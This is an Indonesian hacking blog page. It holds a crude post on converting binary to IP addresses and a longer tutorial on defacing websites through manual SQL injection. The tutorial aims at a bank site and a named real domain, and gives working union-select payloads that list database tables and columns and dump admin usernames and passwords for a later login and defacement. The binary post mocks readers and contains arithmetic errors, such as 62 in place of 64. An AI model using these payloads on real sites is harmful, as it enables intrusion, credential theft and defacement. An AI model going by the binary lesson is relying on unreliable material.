Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

3

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

mp3 Player

Efek klik kanan

Kamis, 22 September 2016

IP to Binary or Binary to IP

Woi cok :3 | Cekidot kita blajar biner "IP to Binary or Binary to IP"
Cuma 2 soal :3
Btw orang goblog juga bisa biner! Mungkin anak SD juga bisa :p
Soalnya pelajaran nya cuma tambah"an doang ko, jadi kalo lu gk bisa berarti lu harus balik ke SD malah kalo lebih parah lagi ke TK lagi sana :p
Jadi lu semua tuh jangan ngandelin website yg bisa nerjemahin Abjad ke biner itu sama aja lu Bego !
Contoh websitenya = http://binarytranslator.com/
 Lu cuma buat setatus di FB gaya"an pake bahasa biner padahal bahasa biner lu itu hasil translate dari site diatas :p
Jangan gaya"an jadi hacker dah padahal SKILL NOOB KOAR" :P
ok sory cok gw tadi kesel :3 :v
Cekodott
Contoh Soal  :
1- 100100-001011-000010-000101.
2- 192,168,32,5

Pertama kita hitung bit ke bit dari satu sampe 128bit
Bit => 128,62,32,16,8,4,2,1

Pertama kita harus Paham , suatu rumus dasar untuk mengetahui berapakah angka biner yg tepat dari sebuah angka yang kita ketahui, yaitu dengan menerapkan dasar bilangan 2 x pangkat meningkat, mulai dari pangkat 0 sampai pangkat 7.
Btw gambar boleh betak di gugel
Untuk menentukan rangkaian bil. binernya kita kalkulasi dari hasil perpangkatan tsb

Btw gambar boleh betak di gugel 
 jadi, kurang lebihnya sepeti di atas atu sebenarnya bisa juga dengan menggunakan kalkulator dengan hanya memasukan angka dan menekan tombol bin, tapi kalo mau otak lu maju dari bebel jadi pinter ya itung dewek 
Sebener nya sama kaya lu beli flasdisk :v ukuran nya sama kan  ?
Soal pertama adalah 32bit, lu liat aja di atas "1" angkanya 32

128,62,32,16,8,4,2,1
            1 , 0 , 0,1 ,0,0
Dibawah angka 1 angka apa dek ? 0 kan ? 
Dibawah angka 2 angka apa dek ? 0 kan ? 
Dibawah angka 4 angka apa dek ? 1 kan ? 
Dibawah angka 8 angka apa dek ? 0 kan ?
Dibawah angka 16 angka apa dek ? 0 kan ? 
Dibawah angka 32 angka apa dek ? 0 kan ? 
Jadi lu itung 4 +32 =36
yg "1" di hitung yang "0" jangan di Hitung cok 
dan kita baru dapet angka ip pertama nya :(
Ok itung lagi
128,62,32,16,8,4,2,1  
              0, 0 ,1,0,1,1
              0 , 0 ,0 , 1,0
              0 , 0 , 1,  0,1

Cara nya sama kaya yang di atas :3 tinggal ikutin aja langkah nya
Dibawah angka 1 angka apa dek ? 1 kan ? 
Dibawah angka 2 angka apa dek ? 1 kan ? 
Dibawah angka 4 angka apa dek ? 0 kan ? 
Dibawah angka 8 angka apa dek ? 1 kan ?
Dibawah angka 16 angka apa dek ? 0 kan ? 
Dibawah angka 32 angka apa dek ? 0 kan ? 

Jadi lu itung 8+2+1 = 11

Dibawah angka 1 angka apa dek ? 1 kan ? 
Dibawah angka 2 angka apa dek ? 0 kan ? 
Dibawah angka 4 angka apa dek ? 1 kan ? 
Dibawah angka 8 angka apa dek ? 0 kan ?
Dibawah angka 16 angka apa dek ? 0 kan ? 
Dibawah angka 32 angka apa dek ? 0 kan ? 

Jadi lu itung 2 = 2

Dibawah angka 1 angka apa dek ? 1 kan ? 
Dibawah angka 2 angka apa dek ? 1 kan ? 
Dibawah angka 4 angka apa dek ? 0 kan ? 
Dibawah angka 8 angka apa dek ? 1 kan ?
Dibawah angka 16 angka apa dek ? 0 kan ? 
Dibawah angka 32 angka apa dek ? 0 kan ? 

Jadi lu itung 4+1 = 5

Jadi ip  yg soal pertama adalah : IP: 36,11,2,5

Lanjut besok cok :)

Kamis, 08 September 2016

Deface Method Sql Injection

Ok boy kita siap" untuk coli di bank
Cekidot Pertama u cari target pake dork/udah di targetin nyet
Coba kita liat web nya masih bae bae kan !
Ni liat cuk
Nah coba kita kasih tanda kutip satu ' atau  minus -
Nah pas kita masukin tanda minus Target nya blank tapi masih ada background bank nya
Liat aja
Nah abis itu lu masukin syntax union select atau union all select buat tau mana kolom yg vuln
contoh : union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Contoh:
http://www.target.com/partners.php?id=2 order by 1–  no error
http://www.target.com/partners.php?id=2 order by 2–  no error
http://www.target.com/partners.php?id=2 order by 3–  no error
http://www.target.com/partners.php?id=2 order by 4–  no error
http://www.target.com/partners.php?id=2 order by 5–  no error
http://www.target.com/partners.php?id=2 order by 6–  no error
http://www.target.com/partners.php?id=2 order by 7–  error

kalo gw langsung,simple :v
http://www.target.com/about.php?id=1&subcat=-28%20union%20all%20select%20group_concat%28username%2C0x3a%2Cpsswd%2C0x3a%2Cemail%29%20from%20users--
Dan.... Tarrrraaaa......
Passs admin udah gw Betak~  :v  dan berakhir sudah artikel coli ini :3
cari log admin dewek
kalo gk tau login admin silakan cari login admin nya di sini Click Me ;)


Btw arti dari 0x3a adalah tanda sama dengan yg titik dua :3 kyk gini  :
dahh... wkwkw gk jelas :v
sebener nya gw males buat tutor kaya gini :( jadi nya artikel gw gk jelas kan :3 :v


yaudah nih gw kasih yg jelas
sumber : https://ariefgembiz.wordpress.com/2013/03/02/cara-deface-website-menggunakan-sql-injection-manual/

contoh :
http://www.zenfocus.com/partners.php?id=2
nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung

teradapat VULN
teradapat VULN
Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
Contoh:
http://www.zenfocus.com/partners.php?id=2 order by 1–  no error
http://www.zenfocus.com/partners.php?id=2 order by 2–  no error
http://www.zenfocus.com/partners.php?id=2 order by 3–  no error
http://www.zenfocus.com/partners.php?id=2 order by 4–  no error
http://www.zenfocus.com/partners.php?id=2 order by 5–  no error
http://www.zenfocus.com/partners.php?id=2 order by 6–  no error
http://www.zenfocus.com/partners.php?id=2 order by 7–  error
eror table ke 7
eror table ke 7
Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6–

Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6–

Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda —
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
bahan post 2
Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=
bahan post 2
dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –>  MySQL –> MySQL CHAR()
bahan post 2
setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok 
sehingga perintah kita menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–
Setelah itu tekan Execute
Dan hasilnya
bahan post 2
Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—
bahan post 2
tekan Execute
dan hasilnya
bahan post 2
Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat sobat